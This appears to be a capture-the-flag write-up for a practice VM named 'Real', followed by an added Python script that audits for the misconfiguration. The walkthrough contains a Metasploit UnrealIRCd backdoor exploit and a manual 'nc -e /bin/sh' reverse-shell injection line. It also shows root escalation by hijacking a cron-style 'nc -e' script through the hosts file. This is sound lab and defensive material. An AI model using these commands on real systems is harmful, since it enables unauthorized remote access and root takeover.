# Lab setup
Download: Real
Network mode: NAT, IP: 192.168.1.139
# Attack walkthrough
# Initial reconnaissance
```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 db:28:2b:ab:63:2a:0e:d5:ea:18:8d:2f:6d:8c:45:2d (RSA)
|   256 cd:a1:c3:2e:20:f0:f3:f6:d3:9b:27:8e:9a:2d:26:11 (ECDSA)
|_  256 db:98:69:a5:8b:bd:05:86:16:3d:9c:8b:30:7b:a3:6c (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
6667/tcp open  irc     UnrealIRCd
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
```
Port 80 yielded nothing. Searching for UnrealIRCd turned up an exploit module.
Only the perl payload seemed to work; the others got no response when fired at the target.
```
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.139    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    6667             yes       The target port (TCP)

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  8888             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP handler on 192.168.1.129:8888
[*] 192.168.1.139:6667 - Connected to 192.168.1.139:6667...
    :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
    :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.1.139:6667 - Sending backdoor command...
[*] Command shell session 2 opened (192.168.1.129:8888 -> 192.168.1.139:37974) at 2024-05-18 08:39:20 -0400

id
uid=1000(server) gid=1000(server) groups=1000(server)
```
I did not try the perl script found in searchsploit, because it fetches a script from the internet and I had no outbound access set up.
Extracting the payload and sending it directly should work just as well:

```
echo "AB;nc -e /bin/sh 192.168.1.129 4444" | nc 192.168.1.139 6667
```
# Privilege escalation
Manual searching turned up nothing, so I ran linpeas.sh.
The scan found /opt/task.
Its contents:
```bash
#!/bin/bash
domain='shelly.real.nyx'
function check(){
    timeout 1 bash -c "/usr/bin/ping -c 1 $domain" > /dev/null 2>&1
    if [ "$(echo $?)" == "0" ]; then
        /usr/bin/nohup nc -e /usr/bin/sh $domain 65000
        exit 0
    else
        exit 1
    fi
}
check
```
So there is a reverse shell script here: I simply edited the hosts file so that the domain resolves to my machine.
Listen on port 65000, wait a moment, and the root shell arrives.
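As an added defender-side example (not part of the original writeup), the following Python audit reads a root-run script such as /opt/task, reports any `nc -e` outbound shell whose destination is a hostname rather than a fixed IP, and flags a hosts file that non-root users can write to. The sample script text is copied from the listing above; the hosts-file mode values are constructed.

```python
import re
import stat
import ipaddress

# Copy of the /opt/task script from the writeup, used here as sample input.
SAMPLE_TASK = """#!/bin/bash
domain='shelly.real.nyx'
function check(){
timeout 1 bash -c "/usr/bin/ping -c 1 $domain" > /dev/null 2>&1
if [ "$(echo $?)" == "0" ]; then
/usr/bin/nohup nc -e /usr/bin/sh $domain 65000
exit 0
else
exit 1
fi
}
check
"""

# Simple shell assignments such as domain='shelly.real.nyx'
ASSIGN_RE = re.compile(r"^\s*(\w+)=['\"]?([^'\"\s]+)['\"]?\s*$", re.M)
# nc -e <program> <destination> <port>
NC_RE = re.compile(r"\bnc\b[^\n]*?\s-e\s+(\S+)\s+(\S+)\s+(\d+)")


def expand(token, env):
    """Resolve a $var or ${var} reference using the script's own assignments."""
    m = re.fullmatch(r"\$\{?(\w+)\}?", token)
    return env.get(m.group(1), token) if m else token


def audit_task_script(script, hosts_mode):
    """Return findings for a script run by root: nc -e shells whose
    destination depends on name resolution, and a writable hosts file."""
    env = dict(ASSIGN_RE.findall(script))
    findings = []
    for m in NC_RE.finditer(script):
        shell, target, port = m.group(1), expand(m.group(2), env), m.group(3)
        findings.append(f"outbound shell: nc -e {shell} to {target}:{port}")
        try:
            ipaddress.ip_address(target)
        except ValueError:
            findings.append(f"destination {target} is a hostname: whoever controls "
                            f"its resolution receives root's shell")
    if hosts_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"hosts file mode {oct(hosts_mode)} is writable by non-root users")
    return findings


if __name__ == "__main__":
    for finding in audit_task_script(SAMPLE_TASK, 0o666):  # constructed mode
        print(finding)
```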
# Summary
Backdoor + scheduled task + hosts-file resolution